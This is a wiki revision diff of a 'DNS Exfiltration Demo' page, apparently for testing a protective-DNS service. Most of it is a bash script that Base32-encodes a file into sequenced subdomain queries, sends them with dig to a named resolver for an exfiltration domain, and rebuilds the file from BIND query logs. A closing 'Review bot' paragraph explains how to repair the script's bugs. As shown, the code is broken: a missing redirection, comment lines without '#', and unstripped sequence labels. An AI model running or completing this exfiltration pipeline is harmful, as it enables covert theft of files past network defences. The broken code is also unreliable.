dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

dns:dns_exfiltration [2023/05/28 19:39] bstafford
dns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
 ===== Simple Exfiltration ===== ===== Simple Exfiltration =====
 Note that the BIND logs will be approximately 17 times the size of the transferred file. Note that the BIND logs will be approximately 17 times the size of the transferred file.
-<code>SOURCE=/home/name/dns_exfil_test/releasenotes.pdf+ 
 +Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. 
 +<code># File to be exfiltrated 
 +SOURCE=/home/name/dns_exfil_test/file.pdf 
 + 
 +
 ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
-ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt +ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt 
-DOMAIN=domain.com+ 
 +# SLD of exfiltration domain 
 +DOMAIN=ferrety-solutions.com 
 + 
 +# sub-domain off SLD that we change for every file
 SUBDOM=asdf SUBDOM=asdf
-LOCALDNS=protectivedns.example.com+ 
 +# Target DNS server (e.g. NIOS with DFP or BloxOne Host) 
 +# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100 
 + 
 +# Log file that the DNS queries can be found in on the authoritative DNS server
 BIND_LOG_FILE=/var/log/named/query.log BIND_LOG_FILE=/var/log/named/query.log
-DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf 
  
 +# File to put the decrypted, received file into (should be a replica of SOURCE)
 +DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
-# Encrypt source file into Base32 and then split into strings of 32 characters each. Then suffix on the domain to query. 
-base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > $ENCRYPTED 
  
-Use DIG to iterate over the file and resolve the DNS+Encrypt source file into Base32 
-dig +short A @$LOCALDNS -$ENCRYPTED+# then split into strings of 32 characters each.  
 +# Then suffix on the domain to query. 
 +# Then add the line number to the start of each line (i.e. put a sequence number on each query) 
 +# Then replace the whitespace at the start of each line with nothing (i.e remove it) 
 +# Then replace the TAB between the number and domain with a "." 
 +base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g"$ENCRYPTED
  
-OR+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate) 
 + 
 +# Exfiltrate the file with DIG. 
 +dig +short A @$LOCALDNS -f $ENCRYPTED
  
-for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 1;done 
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
-# Parse DNS Server logs, extract queries to exfiltration domain+## The following commands get run on the command auth DNS server. 
 +# Parse DNS Server logs 
 +# Then limit the scope just the queries associated with the SUBDOM that we set (i.e. ignore all the other random stuff we get/ignore any other exfiltration tasks running). 
 +# Then extract just the FQDN query itself 
 +# Then strip the ( character 
 +# Then strip the ): character 
 +# Put the output into ENCRYPTED2 (i.e the DNS server's copy of the encrypted file.
 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2 cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2
  
-# Convert back from Base32 and recreate original file. +Take the ENCRYPTED2 file 
-cat $ENCRYPTED2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>+# Then stip off the DOMAIN bit of the data. 
 +# Then sort the output as sometimes queries come in on the wrong order. 
 +# remove duplicate queries (BloxOne Threat Defense seems to duplicate stuff a bit). 
 +# Then strip out the new line character to so we just have a bunch of Base32 code. 
 +# Then convert Base32 back to normal file. 
 +Convert back from Base32 and recreate original file. 
 +cat $ENCRYPTED2 | sed "s/.$SUBDOM.$DOMAIN//g" | sort | uniq | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT</code>
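Review bot: the decode pipeline on the final line never removes the sequence-number label that the encode line adds with `nl`, and `sort` without `-n` orders those labels lexicographically (`10.` before `2.`), so `base32 --decode` receives the chunks out of order and still prefixed with digits and a dot that are outside the Base32 alphabet. After `sed "s/.$SUBDOM.$DOMAIN//g"` each line has the form `N.CHUNK`; `sort -n | uniq | cut -d. -f2` in place of `sort | uniq` restores the original order, drops the BloxOne duplicates and strips the prefix before `tr -d '\n'`. Two further points stop the block running as pasted: the encode line ends `sed "s/\\t/./g"$ENCRYPTED` with no `>` redirection before `$ENCRYPTED`, and the lines "Encrypt source file into Base32", "Take the ENCRYPTED2 file" and "Convert back from Base32 and recreate original file." are comments missing their leading `#`, so the shell will try to execute them. Minor: `grep $SUBDOM.$DOMAIN` uses an unescaped `.` and an unanchored pattern, so `grep -F ".$SUBDOM.$DOMAIN"` is the safer filter when other names in the query log could match.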
dns/dns_exfiltration.1685302799.txt.gz · Last modified: by bstafford